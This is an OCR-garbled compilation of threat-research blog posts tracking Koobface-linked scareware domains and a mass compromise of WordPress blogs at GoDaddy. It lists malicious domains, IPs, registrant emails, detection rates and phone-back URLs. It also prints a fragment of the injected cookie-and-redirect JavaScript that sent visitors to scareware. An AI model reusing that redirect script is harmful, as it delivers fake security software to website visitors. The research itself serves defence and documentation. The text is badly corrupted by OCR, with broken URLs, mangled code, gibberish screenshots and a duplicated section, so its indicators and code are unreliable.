antispy-detectz9.com - Email: test@now.net.cn 
antispy-scan4i.com - Email: test@now.net.cn 
antispy-scan5i.com - Email: test@now.net.cn 
antispy-scan6i.com - Email: test@now.net.cn 
antispy-scan7i.com - Email: test@now.net.cn 
antispyscan85.com - Email: test@now.net.cn 
antispyscan89.com - Email: test@now.net.cn 
antispyscan91.com - Email: test@now.net.cn 
antispyscan92.com - Email: test@now.net.cn 
antispyscan93.com - Email: test@now.net.cn 



antispy-scan9i.com - Email: test@now.net.cn 
antispyware-nol.com - Email: test@now.net.cn 
antispyware-no3.com - Email: test@now.net.cn 

antivirl a. com.xorg.pl 

antivirus-detect21.com - Email: test@now.net.cn 
antivirus-detect23.com - Email: test@now.net.cn 
antivirus-detect25.com - Email: test@now.net.cn 
antivirus-detect27.com - Email: test@now.net.cn 
antivirus-detect29.com - Email: test@now.net.cn 
antivirus-detectzl.com - Email: test@now.net.cn 
antivirus-detectz2.com - Email: test@now.net.cn 
antivirus-detectz5.com - Email: test@now.net.cn 
antivirus-detectz7.com - Email: test@now.net.cn 
antivirus-detectz9.com - Email: test@now.net.cn 
antivirus-lvl.com - Email: test@now.net.cn 
antivirus-lv2.com - Email: test@now.net.cn 
antivirus-lv3.com - Email: test@now.net.cn 
antivirus-lv5.com - Email: test@now.net.cn 
antivirus-lv8.com - Email: test@now.net.cn 
antivirus-topl.com - Email: test@now.net.cn 



antivirus-top2.com - Email: test@now.net.cn 
antivirus-top6.com - Email: test@now.net.cn 
antivirus-top8.com - Email: test@now.net.cn 

be-secured. xorg.pl 
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bestantivirusl. com.xorg.pl 

bestscanmalware. com.xorg.pl 

best-security.xorg.pl 

defender20.xorg.pl 

fastantivirusscannerl 5. com.xorg.pl 

fastmalwarescanl5.com.xorg.pl 

fast-scan.xorg.pl 

fastweb-scanner.com.xorg.pl 

get-protection.xorg.pl 

my-computers.xorg.pl 

protection! 00.xorg.pl 

protection-centerl .xorg.pl 

protectorl 0. xorg.pl 

securelO.xorg.pl 
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security 1 .xorg.pl 
security 100.xorg.pl 
spy-defenderl. com 
spydefenderl. com.xorg.pl 
spydefenderl 1. com.xorg.pl 



spy-defenderla.com - Email: test@now.net.cn 
spy-defender2.com - Email: test@now.net.cn 
spy-defender2a.com - Email: test@now.net.cn 
spy-defender4a.com - Email: test@now.net.cn 
spy-defender5.com - Email: test@now.net.cn 
spy-defender6a.com - Email: test@now.net.cn 
spy-defender8a.com - Email: test@now.net.cn 
spy-defender9.com - Email: test@now.net.cn 
spy-protection01.com - Email: test@now.net.cn 
spy-protectionl.com - Email: test@now.net.cn 
spy-protectionl4.com - Email: test@now.net.cn 
spy-protectionl7.com - Email: test@now.net.cn 
spy-protectionl9.com - Email: test@now.net.cn 
spy-protection3.com - Email: test@now.net.cn 
spy-protection4.com - Email: test@now.net.cn 
spy-protection6.com - Email: test@now.net.cn 
spy-protection8.com - Email: test@now.net.cn 
spy-scanner2i.com - Email: test@now.net.cn 
spy-scanner6i.com - Email: test@now.net.cn 
spy-scanner8i.com - Email: test@now.net.cn 



spyware-sweepl.com - Email: test@now.net.cn 
spyware-sweepli.com - Email: test@now.net.cn 
spyware-sweep2i.com - Email: test@now.net.cn 
spyware-sweep3.com - Email: test@now.net.cn 
spyware-sweep3i.com - Email: test@now.net.cn 
spyware-sweep4i.com - Email: test@now.net.cn 
spyware-sweep5.com - Email: test@now.net.cn 
spyware-sweep7.com - Email: test@now.net.cn 
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spyware-sweep8.com - Email: test@now.net.cn 
spyware-sweep9i.com - Email: test@now.net.cn 
virus-sweeperOi.com - Email: test@now.net.cn 
virus-sweeperl.com - Email: test@now.net.cn 

















virus-sweeper2.com - Email: test@now.net.cn 
virus-sweeper2i.com - Email: test@now.net.cn 
virus-sweeper3.com - Email: test@now.net.cn 
virus-sweeper4i.com - Email: test@now.net.cn 
virus-sweeper6.com - Email: test@now.net.cn 
virus-sweeper7i.com - Email: test@now.net.cn 
virus-sweeper8.com - Email: test@now.net.cn 
virus-sweeper8i.com - Email: test@now.net.cn 
win-antispywarel 0. com.xorg.pl 
windefenderl .xorg.pl 
windo ws-secure.xorg.pl 
win-security.xorg.pl 
win webscannerl 0. com.xorg.pl 

Parked within A531252, STARNET-AS StarNet Moldova are 
also: 195.5.161.11; 195.5.161.145 

spy-scanner20.com - Email: test@now.net.cn 

spy-scanner30.com - Email: test@now.net.cn 

spy-scanner3i.com - Email: test@now.net.cn 

spy-scanner40.com - Email: test@now.net.cn 

spy-scanner4i.com - Email: test@now.net.cn 



spy-scanner60.com - Email: test@now.net.cn 
spy-scanner80.com - Email: test@now.net.cn 
virscanner-done4.com - Email: test@now.net.cn 
virscanner-done5.com - Email: test@now.net.cn 

- Detection rate for the sea reware sample: Setup _312s2.exe 

- [10 JHeuristic.Beha vesLike. Win32. Trojan.H - Result: 
5/40 (12.50 %) phones back to windows-mode.com/? 
b=lsl - 89.248.168.21 , AS29073, ECATEL-AS , Ecatel 



Network - Email: contact@privacy-protect.cn 
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anti spywarelist, com 



Parked on the phone-back IP are also the following domains: 
firewall-rules2.com - Email: contact@privacy-protect.cn 
version-upgrade.com - Email: contact@privacy-protect.cn 
2accommodation.com - Email: ttvmaill2@hotmail.com 
systemreserves.com - Email: contact@privacy-protect.cn 
cariport.com - Email: contact@privacy-protect.cn 
spyblocktest.com - Email: contact@privacy-protect.cn 
antispywareiist.com - Email: contact@privacy-protect.cn 
checkwhiteiist.com - Email: contact@privacy-protect.cn 
chekmalwarelist.com - Email: contact@privacy-protect.cn 






Stay tuned for more updates on recent Koobface gang 
activities, beyond the Koobface botnet. 

Related Koobface gang/botnet research: 

[HJKoobface Redirectors and Scareware Campaigns Now 
Hosted in Moldova 

[12] 10 things you didn't know about the Koobface gang 

[13] A Diverse Portfolio of Scareware/Blackhat SEO 
Redirectors Courtesy of the Koobface Gang 

[14] How the Koobface Gang Monetizes Mac OS X Traffic 

[15] The Koobface Gang Wishes the Industry "Happy 
Holidays" 

[16] Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken 
Offline 

[17] Koobface Botnet Starts Serving Client-Side Exploits 

[18] Massive Scareware Serving Biackhat SEO, the Koobface 
Gang Style 

[19] Koobface Botnet's Scareware Business Model - Part Two 

[20] Koobface Botnet's Scareware Business Model - Part One 

[21 ]Koobface Botnet Redirects Facebook's IP Space to my 
Blog 

[22] New Koobface campaign spoofs Adobe's Flash updater 

[23] Social engineering tactics of the Koobface botnet 

[24] Koobface Botnet Dissected in a Trend Micro Report 



[25] Movement on the Koobface Front - Part Two 

[26] Movement on the Koobface Front 

[27] Koobface - Come Out, Come Out, Wherever You Are 
357 

[28] Dissecting Koobface Worm's Twitter Campaign 

This post has been reproduced from [29]Dancho 
Danchev's blog. Follow him [30]on Twitter. 

1. http-.//twitter. com/Real Koobface 

2. httD://bloas.zdnet.com/securit v/? D=5452 

3. http://www.aooale.com/safebrowsina/diaanostic? 
site ^ xor a.pl/ 

4. http://ddanchev.blo as pot.com/2010/03/koobface- 
redirectors-and-scare ware, h tml 

5. htto://ddanchev.blo as oot.com/2009/1 l/koobface-botnets- 
scareware-business. html 

6. http://ddanchev.bio as pot.com/2009/12/koobface-aan a- 
wishes-industrv-ha oo v.html 

7. 

http://www. virustotal. com/analisis/69b 78dd99321 acbl dec25 

cad3da9e9a545cb 7554195081 e33ca99c23a24bl 0e3-12 722 

94422 


8 . 

























htto://www. virustotal. com/analisis/ad41ffce9c9c9f70b9a69c5 

cbaac2d334b42cfb03022e59dG52c493bblf3508e-12722 

94936 

9. 

htto://www. virustotal. com/analisis/30f5371a67cb6001 f8bb5d 

c2076bfbl 7c24c675599e99d32adc049610bc6620b-12722 

95423 

10 . 

https://www. virustotal. com/analisis/8110b790ea6600f8b712c 

c68bl 95302c450a3993df84f7163dbb 7938d22e55d0-127 

2294429 

11. http://ddanchev.blo as pot.com/2010/03/koobface- 
redirectors-and-scareware.html 

12. http://bloas.zdnet. com/securit v/? p=5452 

13. http://ddanchev.blo as pot.com/2010/02/diverse-portfolio- 
of-scarewareblackhat.html 

14. http.V/ddanchev.blo as pot.com/2010/02/how-koobface- 
aana-monetizes-mac-os-x.htm / 

15. http.V/ddanchev.blo as pot. com/2009/12/koobface-aan a- 
wishes-industrv-ha pp v.html 

16. http.V/ddanchev.blo as pot. com/2009/12/koobface-friendl v- 
riccom-ltd-as29550. html 


17. http.V/ddanchev.blo as pot.com/2009/11/koobface-botnet- 
starts-servina-clien t. html 




































18. htto.V/ddanchev.blo as oot.com/2009/11/massive- 
scareware-servina-blackhat-seo.html 

19. htto.V/ddanchev.blo as oot. com/2009/1 1/koobface-botnets- 
scareware-business. him I 

20. http.V/ddanchev.blo as pot.com/2009/09/koobface-botnets- 
scareware-business. him I 

21. http://ddanchev.blo as pot.com/2009/1O/koobface-botnet- 
redirects-facebooks-io.html 

22. htto://bloas.zdnet.com/securit v/? o=4594 

23. http://content.zdnet.com/2346-12691 22-352597.html 

24. htto.V/ddanchev.blo as oot. com/2009/10/koobface-botnet- 
dissected-in-trendmicro. html 

25. htto.V/ddanchev.blo as oot. com/2009/08/movement-on- 
koobface-front-oart-two.html 

26. htto.V/ddanchev.blo as oot. com/2009/08/movement-on- 
koobface-front.html 

27. htto.V/ddanchev.blo as oot.com/2009/07/koobface-come- 
out-come-out-wherever-vou.html 

28. htto.V/ddanchev.blo as oot. com/2009/07/dissectin a- 
koobface-worms-twitter.html 

29. htto.V/ddanchev.blo as oot. com/ 

30. htto://twitter.com/danchodanchev 
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function setCookie(c__naroe,value#expiredays)< 
var exdate-new Date(); 

exdate.setDate(exdate.getDate()+explredays); 
document.cookle-c_name+ "■" -fescape (value) + 

((expiredays--null) ? "" : ";expires-"+exdate.toGHTStrmgO ); 

> 


function getCookie (c__naroe) ( 
if (document.cookie.length>0) 

< 

c_start-document.cookie.indexOf(c_name + "•"); 
if (c_start*“-l) 

{ 

c_start-c_start + c_name.length+1; 
c_end-doeument.cookie. indexOf ("; ",c_start); 
if (e_end—-1) c_end-document .cookie. length; 
return unescape(document.cookie.substring(c_start,c_end)); 
) 

) 

return ""; 

> 

var name-getCookie ("pjna_visited_themel"); 
if (name—"") ( 

setCookie ("proa_visited_themel", "1", 20); 


var ur l-"http://www3 .sdf hj40-td.xorg. pl?p»p52dc¥pkbG6Hnc3KbitNToKVliqHWnG2aXsiYrrtnhw2Jubwg%3D%3D M ; 
window.top.location.replace(uri); 

}else( 


GoDaddy's Mass WordPress Blogs Compromise 
Serving Scareware (2010-04-27 21:22) 

UPDATED: Thursday, May 13, 2010: Go Daddy posted the 
following update "[IJWhat's Up with Go Daddy, 
WordPress, PHP Exploits and Malware? ". 

UPDATED: Thursday, May 06, 2010: The following is a 
brief update of the campaign's structure, the changed 

IPs, and the newly introduced scareware samples+phone 
back locations over the past few days. 

Sample structure from last week: 

- kdjkfjskdfjlskdjf.com/kp.php - 94.23.242.40 - AS16276, 
OVH Paris 

- www3.workfree36-td.xorg.pl/?p= - 95.169.186.25 - 
AS31103, KEYWEB-AS Key web AG 




- wwwl.protectsys28-pd.xorg.pl - 94.228.209.182 - 
AS47869, NETROUTING-AS Netrouting Data Facilities 
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Detection rate: 


- packupdate buildl07 2045.exe - 

[2]Gen:Variant. Ursnif.8; TrojanDownloader:Win32/FakeVimes - 
Result: 23/41 

(56.1 %) Phones back to update2.safelinkhere.net and 
updatel.safelinkhere. net. 

Sample structure from this week: 

- kdjkfjskdfjlskdjf.com/kp.php - 91.188.59.98 - AS6851, 
BKCNET "SIA " IZZl 


- www4.suitcase52td.net/?p= - 78.46.218.249 - AS24940, 
HETZNER-AS Hetzner Online AG RZ 


- wwwl.safetypcwork5.net/?p= - 209.212.147.244 - 
AS32181, ASN-CQ-GiGENET CoioQuest/GigeNet ASN 





- wwwl.safeyourpc22-pr.com - 209.212.147.246 - Email: 
gkook@checkjemaU. nl 

Detection rate: 

- packupdatebuild9 2045.exe - 

[3JTrojan. Fakealert. 7869; MaI/FakeAV-BW - Result: 9/41 
(21.95 %) 

Sample phones back to: 

- update2.keepinsafety.net/? 
jbjyhxs=kdjfOtXm 1J2a 0Nei2Mrh24 U %3D 

- www5.my-security-engine.net 


report, land-protection.com 
/Reports/SoftServiceReport.php?verint 


91.207.192.24 


Email: 

gkook@checkjemaU. nl 

- secure2.securexzone.net/?abbr=MSE &pid=3 - 

78.159.108.170 - Emaikl: gkook@checkjemail.nl 


- 173.232.149.92 /chrome/report. html?uid=2045 
&wv=wvXP & 



- 74.118.193.47/report.html?wv=wvXP &uid=50 
&lng= 

- 74.125.45.100 

- updatel.keepinsafety.net - 94.228.209.223 - Email: 
gkook@checkjemaU. nl 

Related scareware domains part of the ongoing campaign 
are also parked on the following IPs: 

78.46.218.249 

www3. workfree20-td.xorg.pl 
www3. nojimba52-td.xorg.pl 
www3. workfree25-td.xorg.pl 
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x Your CocnfHitc* is infected 


He*"* 

9 Iro»*n-Vr»r» 

Q WUJMt W — 1 

9 WJIAckMiUMam 

9 W 


9 WARN1M. * 

Type TVeet ie«*l 

vrj» 



He< m —««■» * CVt s<yl Protects"* tvtle*» * Ivtw | Start Protector 


209.212.147.244 





















wwwl.newsys-scanner.com - Email: 
gkook@checkjemaU. nl 

www2.securesys-scan2.net - Email: 
gkook@checkjemail. nl 

wwwl.new-sys-scanner3.net - Email: 
gkook@checkjemaU. nl 

wwwl.safetypcwork5.net - Email: gkook@checkjemail.nl 
wwwl.securesyscare9.net - Email: gkook@checkjemail.nl 
wwwl.freeguard35-pr.net - Email: gkook@checkjemail.nl 
95.169.186.25 

www4.ararat23.xorg.pl 
www3.sdfhj40-td.xorg.pl 
www3.nojimba45-td.xorg.pl 
www3. workfree36-td.xorg.pl 
www3. nojimba46-td.xorg.pl 
www4. fiting58td.xorg.pl 
www4. birbinsof. net 
94.228.209.182 

wwwl .protectsys25-pd.xorg.pl 
wwwl .protectsys26-pd.xorg.pl 
wwwl .protectsys27-pd.xorg.pl 



wwwl .protectsys28-pd.xorg.pl 
wwwl .protectsys29-pd.xorg.pl 
wwwl.soptvirus32-pr.xorg.pl 
wwwl.soptvirus34-pr.xorg.pl 
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• new-sys-scanner3.net 



209.212.147.246 

www2.securesys-scan2.com - Email: 
gkook@checkjemaii. nl 

wwwl.newsys-scannerl.com - Email: 
gkook@checkjemaii. nl 

UPDATED: Thursday > April 29, 2010: 
kdjkfjskdfjlskdjf.com/js.php remains active and is 
currently redirecting to www3. workfree36-td.xorg.pl/?p= 
- 95.169.186.25 and wwwl.protectsys28-pd.xorg.pl?p= - 

94.228.209.182. 

Detection 

rate: 

packupdate 


build 107 





2045.exe 


[4] Suspicious: W32/Maiware!Gemini; 

Tro¬ 
jan. Win32.Generic, pakicobra - Result: 6/41 (14.64 %) 
phoning back to new domains: 

safelinkhere.net - 94.228.209.223 - Email: 
gkook@checkjemaii. nl 

update2.safelinkhere.net - 93.186.124.93 - Email: 
gkook@checkjemail. nl 

updatel.safelinkhere.net - 94.228.209.222 - Email: 
gkook@checkjemaii. nl 

- nsl.safelinkhere.net - 74.118.192.23 - Email: 
gkook@checkjemaii. nl 

- ns2.safelinkhere.net - 93.174.92.225 - Email: 
gkook@checkjemaii. nl 

The gkook@checkjemail.nl email was used for sea reware 
registrations in December 2009' s "[5]A Diverse Portfolio 
of Fake Security Software - Part Twenty Four ". 
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nsl birbms-ot.com 



Parked on 74.118.192.23, [6JAS46664, VolumeDrive 

(nsl.safelinkhere.net) are also: 

nsl. birbins-of. com 

nsl. cleanupantivirus. com 

nsl. createpc-pcscan-korn. net 






nsl. fhio22nd. net 


nsl.letme-guardyourzone. com 
nsl.letprotectsystem.net 
nsl.my-softprotect4. net 
nsl.ne w-pc-protection. com 
nsl.payment-safety.net 
nsl. romsinkord. com 
nsl.safelinkhere. net 
nsl.safetyearth.net 
nsl.safetypayments.net 
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nsl.sa ve-secure. com 
nsl.search4 vir. net 
nsl.systemmdefender. com 
nsl. upscanyourpc-no w. com 

Parked on 93.174.92.225 , [7JAS29073 ’ ECATEL-A5 , Ecatel 
Network (ns2.safelinkhere.net) are also: 

marmarams. com 

ns2. cleanupantivirus. com 


ns 2. dodtorsans. net 



ns 2. fastsearch-protection.com 
ns2.go-searchandscan. net 
ns2.guardsystem-scanner. net 
ns2.hot-cleanofyourpc.com 
ns2.marfilks.net 
ns2. my-systemprotection.net 
ns 2. myprotected-system. com 
ns2.myprotection-zone.net 
ns2. mysystem protection, com 
ns2. ne w-system protection, com 
ns2. ne wsystem-guard. com 
ns 2. onguard-zone. net 
ns2.pcregrtuy. net 
ns2.plotguardto-mypc. com 
ns2. protected-field, com 
ns2.safelinkhere. net 
ns2.scanmypc-online. com 
ns2.search-systemprotect.net 
ns2.searchscan-oniine.net 


ns2.securemyzone. com 



ns2.systemcec7. com 
ns2. trust-systemprotect.net 
ns2. trustscan-onmyzone. com 
ns2. trustsystemguard. net 
ns2. upscanyour-pcno w. com 
ns2. windows-systemshield.net 
ns2. windows-virusscan.com 
ns2. win do wsadditionalguard. net 
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Following last week's Network Solutions mass compromise of 
Word Press blogs ([8]Dissecting the WordPress Blogs 

Compromise at Network Solutions), over the weekend a 
similar incident took place Go Daddy, [9]according to 
WPSecurityLock. 

Since the campaign's URLs still active, and given the fact 
that based on historical OS I NT, we can get even 




more insights into known operations of cybercriminals 
profiled before (one of the key domains used in the 
campaign 

is registered to hiiarykneber@yahoo.com. Yes, that 
Hilary Kneber.), it's time to connect the dots. 

• Related Hilary Kneber posts: [lOJThe Kneber botnet - 
FAQ; [ll]Ceiebrity-Themed Sea re ware Campaign 
Abusing DocStoc; [12]Dissecting an Ongoing Money 
Mule Recruitment Campaign; [13]Keeping Money Mule 
Recruiters on a Short Leash - Part Four 

One of the domains used cechirecom.com/js.php - 
61.4.82.212 - Email: lee _gerstein@yahoo.co.uk was 
redirecting to www3.sdfhj40-td.xorg.pl?p= - 
95.169.186.25 and from there to 

www2.burnvirusnow34.xorg.pi?p= - 217.23.5.51. 


365 



s 1' 


'*• ► Computer ► Virus Scanner 

pcJ| 




f Documents 
£ Pictures 
Music 

tS Recently Changed 
P Searches 
V Pubic 




Hard Drive Antivirus scanner 
Local Disk (C:) 

» 


O 4 infected files 
Windows Security 

Antivirus Protection Disabled 




Local Disk (D:) 87% 

£ 6 Infected files 


Threat Name 

Threat type 

Threat Level 


£ Trojan.Clampilgen 

Vrus 

High 

A J 

0 Trojan. Thuxemeinf 

Vrus 

Medkm 


0 AdvWare.Hotbar 

Vrus 

High 


£ Packed.Genenc.287 

Vrus 

Critical 


£ W32.Fujacks.CE!nf 

Vrus 

Medkm 

V 


Recommended: Qck "Erase Infected" to erase al infected and 
suspicious ftes and make your system protected. 




Status: 

Browser:IE 7.0 

Operation system: Windows Vista 


[ Erase mfecled i 


- 

I 100% 

„ SECURE SITE 


The front page of the currently not responding 
cechirecom.com was returning the following message: 

• " Welcome. Site will be open shortly. Signup, question or 
abuse please send to iarisadoiina@yahoo.com" 

Registered with the same email, larisadolina@yahoo.com, is 
also another domain known have been used in similar 

attacks from February, 2010 - iss9w8s89xx.org. 

Parked on 217.23.5.51 are related sea re ware domains part of 
the campaign: 

www2.burn virusno w31 .xorg.pl 
www2.burn virusno w33.xorg.pl 















www2.burn virusno w34.xorg.pl 

www2.trueguardscaner30-p.xorg.pl 

www2.trueguardscaner33-p.xorg.pl 

wwwl.sa vesysops30p.xorg.pl 

wwwl.suaguardprotectllp.xorg.pl 

www2. realsafepc32p.xorg.pl 

wwwl.suaguardprotectl3p.xorg.pl 

wwwl.suaguardprotectl4p.xorg.pl 

Detection rate for the scareware: 

- packupdate _buildl07 _2045.exe - [14]VirusDoctor; 
Mal/FakeAV-BW - Result: 14/41 (34.15 %) with the sample 
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•.cechirecom.com 



AS ► AS17964 


phoning back to the following URLs: 

- upda te2. sa vecompno w. com/index.php ? 
controller=hash - 91.207.192.25 - Email: 
gkook@checkjemail. nl 

- upda te2. sa vecompno w. com/index.php ? 
controller microinstaller 

- updatel.savecompnow.com/index.php? 
controller- microinstaller - 94.228.209.223 - Email: 
gkook@checkjemaii.nl The same email was originally seen in 
December 2009 's "[15]A Diverse Portfolio of Fake 
Security Software - 

Part Twenty Four". Parked on these IPs are also related 
phone back locations: 






Parked on 188.124.7.156: 

savecompnow.com - Email: gkook@checkjemail.nl 
securemyfield.com - Email: gkook@checkjemail.nl 

updatel.securepro.xorg.pl 

Parked on 91.207.192.25: 

update2.savecompnow.com - Email: 
gkook@checkjemail. nl 

update2.xorg.pl 

update2.winsystemupdates.com - Email: 
gkook@checkjemail. nl 

report.zoneguardland.net - Email: gkook@checkjemail.nl 

Parked on 94.228.209.223: 

updatel.savecompnow.com - Email: 
gkook@checkjemail. nl 

updatel.winsystemupdates.com 
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Although the cechirecom.com/js.php is not currently 
responding, parked on the same IP 61.4.82.212, is another 
currently active domain, which is registered to 

hilarykneber@yahoo. com. 

Parked on 61.4.82.212, AS17964, DXTNET Beijing Dian-Xin- 
Tong Network Technologies Co., Ltd.: 

kdjkfjskdfjlskdjf.com - Email: hiiarykneber@yahoo.com 

nsl.stablednsstuff.com - Email: lee 
_gerstein@yahoo. co. uk 

js.ribblestone.com - Email: skeletor71@comcast.net - 
includes a link pointing to panelscansecurity.org/? 
affid=320 




&subid=lartding - 91.212.127.19 - Email: 
bobarter@xhotmaii. net 

The currently active campaign domain redirection is as 
follows: 

kdjkfjskdfjlskdjf.com/js.php - 61.4.82.212 - Email: 
hiiarykneber@yahoo. com 

- www3.sdfhj40-td.xorg.pi?p= 

- wwwl.soptvirus42-pr.xorg.pl?p= - 209.212.149.19 
Parked on 209.212.149.19: 

www2. burn virusno w43.xorg.pl 

www2.trueguardscaner42-p.xorg.pl 

wwwl.suaguardprotect23p.xorg.pl 

www2.realsafepc27p.xorg.pl 

wwwl. fastfullfind27p.xorg.pl 

wwwl.yesitssafe-no w-forsure.in 
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Detection rate for the sea re ware: 

- packupdate_buildl06_2045.exe - 

[16]TrojanDownloader:Win32/FakeVimes; High Risk 
Cloaked Malware - Result: 7/41 (17.08 %) 

Just like in Network Solution's case ([17]Dissecting the 
WordPress Blogs Compromise at Network Solutions) 



the end user always has to be protected from himself using 
basic security auditing practices in regard to default 
WordPress installations. The rest is wishful thinking, that the 
end user would self-audit himself. 

It seems that hilarykneber@yahoo.com related activities 
are not going to go away anytime soon. 

Related WordPress security resources: 

[18J20 Wordpress Security Plug-ins And Tips To keep Hackers 
Away 

[19] 11 Best Ways to Improve WordPress Security 

[20J20+ Powerful Wordpress Security Plugins and Some Tips 
and Tricks 

This post has been reproduced from [21]Dancho 
Danchev's blog. Follow him [22Jon Twitter. 

1. http-.//communit y aodaddv. com/aodaddv/whats-up-with- 
ao-daddv-wordpress- Dh D-exDloits-and-malware/ 

2 . 

https://www. virustotal. com/anaiisis/38c96fc7f402772beed9c 

83512da6189cb9b92f7f36fc8a5c8b70f2a6fc4faab-12730 

70694 

3. 

http://www. virustotal. com/analisis/d0bba30e43ddc5db394fd 

0c03314d2d2c2 743f7f611 C08f0ael5a8d588ffd990-12 731 

50790 


4 . 



















http.V/www. virustotal. com/analisis/ad643ead6b46c70dba4 74 

Idd548842eab49d2d7d52637f32723c0084366b44b3-12725 


44449 

5. http://ddanchev.blo as pot.com/2009/12/diverse-portfolio- 
of-fake-securitv. html 

6. http://ddanchev. blo as pot. com/2010/04/dns-infrastructure- 
of-monev-mule.html 

7. http://ddanchev. blo as pot com/2010/04/dns-infrastructure- 
of-monev-mule.html 

8. http://ddanchev.blo as pot.com/2010/04/dissectin a- 
wordpress-bloas-compromise.html 

9. http://www. wpsecuritvlock. com/cechriecom-com-scri pt- 
wordpress-hacked-on-aodaddv-case-stud v/ 

10. http://bloas.zdnet.com/securit v/? p=5508 

11. http.V/ddanchev.blo as pot. com/2009/12/celebritv-themed- 
scareware-campaian 07.html 

12. http.V/ddanchev.blo as pot. com/2010/02/dissectin a- 
on aoina-monev-mule.html 

13. http.V/ddanchev.blo as pot.com/2010/04/keepina-mone v- 
mule-recruiters-on-short.html 

14. 

http: //www. virustotal. com/analisis/dl 0679c06cde2785c4fd88 

41607dd44692b4e2e867c015bfeac29d621a6cebd3-12723 


84002 



















































15. http://ddanchev.bio as pot.com/2009/12/diverse-portfoiio~ 
of-fake-securitv.html 


16. 

http://www. virustotal. com/analisis/efd60f4c444baf2bl 91943 

85c4 77b0533580aa430eladl d664afb3d389cc9116-12723 

85512 

17. http://ddanchev.blo as pot.com/2010/04/dissectin a- 
wordDress-bloas-comDromise.html 

18. http://bloa. taraaana. com/index. oh o/archive/20- 
wordDress-securit v- Dlua-ins-and-tiDS-to-keep-hackers-a wa v/ 

19. http://www. probloadesian. com/wordpress/11 -best-wa vs- 
to-impro ve-word press-securit y/ 

20. http://speckvbov. com/2009/09/22/20-powerful- wordoress- 
securit v- oiuains-and-some-tios-and-tricks/ 

21. http.V/ddanchev.blo as pot. com/ 

22. http://twitter.com/danchodanchev 
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GoDaddy's Mass WordPress Blogs Compromise 
Serving Scareware (2010-04-27 21:22) 

UPDATED: Thursday, May 13, 2010: Go Daddy posted the 
following update "[1 ] What's Up with Go Daddy, 
WordPress, PHP Exploits and Malware? ". 

UPDATED: Thursday, May 06, 2010: The following is a 
brief update of the campaign's structure, the changed 












































IPs, and the newly introduced scareware samples+phone 
back locations over the past few days. 

Sample structure from last week: 

- kdjkfjskdfjlskdjf.com/kp.php - 94.23.242.40 - AS16276, 

OVH Paris 

- www3.workfree36-td.xorg.pl/?p= - 95.169.186.25 - 
AS 31103, KEYWEB-AS Key web AG 

- wwwl.protectsys28-pd.xorg.pl - 94.228.209.182 - 
AS47869, NETROUTING-AS Netrouting Data Facilities 
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Detection rate: 

- packupdatebuildl07 2045.exe - 

[2]Gen:Variant.Ursnif.8; TrojanDownloader:Win32/FakeVimes - 
Result: 23/41 

(56.1 %) Phones back to update2.safelinkhere.net and 
updatel.safelinkhere. net. 

Sample structure from this week: 

- kdjkfjskdfjlskdjf.com/kp.php - 91.188.59.98 - AS6851, 
BKCNET "SIA " IZZI 

- www4.suitcase52td.net/?p= - 78.46.218.249 - AS24940, 
HETZNER-AS Hetzner Online AG RZ 

- wwwl.safetypcwork5.net/?p= - 209.212.147.244 - 
AS32181, ASN-CQ-GIGENET ColoQuest/GigeNet ASN 


- wwwl.safeyourpc22-pr.com - 209.212.147.246 - Email: 
gkook@checkjemaU. nl 

Detection rate: 

- packupdatebuild9 2045.exe - 

[3JTrojan. Fakealert. 7869; MaI/FakeAV-BW - Result: 9/41 
(21.95 %) 

Sample phones back to: 

- update2.keepinsafety.net/? 
jbjyhxs=kdjfOtXm 1J2a 0Nei2Mrh24 U %3D 

- www5.my-security-engine.net 


report, land-protection.com 
/Reports/SoftServiceReport.php?verint 


91.207.192.24 


Email: 

gkook@checkjemaU. nl 

- secure2.securexzone.net/?abbr=MSE &pid=3 - 

78.159.108.170 - Emaikl: gkook@checkjemail.nl 


- 173.232.149.92 /chrome/report. html?uid=2045 
&wv=wvXP & 



- 74.118.193.47/report.html?wv=wvXP &uid=50 
&lng= 

- 74.125.45.100 

- updatel.keepinsafety.net - 94.228.209.223 - Email: 
gkook@checkjemaU. nl 

Related scareware domains part of the ongoing campaign 
are also parked on the following IPs: 

78.46.218.249 

www3. workfree20-td.xorg.pl 
www3. nojimba52-td.xorg.pl 
www3. workfree25-td.xorg.pl 
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209.212.147.244 

wwwl.newsys-scanner.com - Email: 
gkook@checkjemail. nl 

www2.securesys-scan2.net - Email: 
gkook@checkjemail. nl 

wwwl.new-sys-scanner3.net - Email: 
gkook@checkjemaU. nl 

wwwl.safetypcwork5.net - Email: gkook@checkjemail.nl 
wwwl.securesyscare9.net - Email: gkook@checkjemail.nl 
wwwl.freeguard35-pr.net - Email: gkook@checkjemail.nl 


95.169.186.25 


www4.ararat23.xorg.pl 
www3.sdfhj40-td.xorg.pl 
www3. nojimba45-td.xorg.pl 
www3. workfree36-td.xorg.pl 
www3. nojimba46-td.xorg.pl 
www4. fiting58td.xorg.pl 
www4. birbinsof. net 
94.228.209.182 

wwwl .protectsys25-pd.xorg.pl 
wwwl .protectsys26-pd.xorg.pl 
wwwl .protectsys27-pd.xorg.pl 
wwwl .protectsys28-pd.xorg.pl 
wwwl .protectsys29-pd.xorg.pl 
wwwl.soptvirus32-pr.xorg.pl 
wwwl.soptvirus34-pr.xorg.pl 
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209.212.147.246 


www2.securesys-scan2.com - Email: 
gkook@checkjemaii. nl 


wwwl.newsys-scannerl.com - Email: 
gkook@checkjemaii. nl 

UPDATED: Thursday; April 29, 2010: 
kdjkfjskdfjlskdjf.com/js.php remains active and is 
currently redirecting to www3. workfree36-td.xorg.pl/?p= 
- 95.169.186.25 and wwwl.protectsys28-pd.xorg.pl?p= - 

94.228.209.182. 

Detection 

rate: 

packupdate 
build 107 
2045.exe 


[4] Suspicious: W32/Malware!Gemini; 

Tro¬ 
jan. Win32. Generic, pak!cobra - Result: 6/41 (14.64 %) 
phoning back to new domains: 

safelinkhere.net - 94.228.209.223 - Email: 
gkook@checkjemaii. nl 


update2.safelinkhere.net - 93.186.124.93 - Email: 
gkook@checkjemaii. nl 



updatel.safelinkhere.net - 94.228.209.222 - Email: 
gkook@checkjemail. nl 


- nsl.safelinkhere.net - 74.118.192.23 - Email: 
gkook@checkjemail. nl 

- ns2.safelinkhere.net - 93.174.92.225 - Email: 
gkook@checkjemail. nl 

The gkook@checkjemail.nl email was used for sea reware 
registrations in December 2009's "[5J A Diverse Portfolio 
of Fake Security Software - Part Twenty Four". 
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Parked on 74.118.192.23, [6JA546664, VolumeDrive 

(nsl.safelinkhere.net) are also: 

nsl. birbins-of. com 

nsl. cleanupantivirus. com 

nsl. createpc-pcscan-korn. net 

nsl. fhio22nd. net 

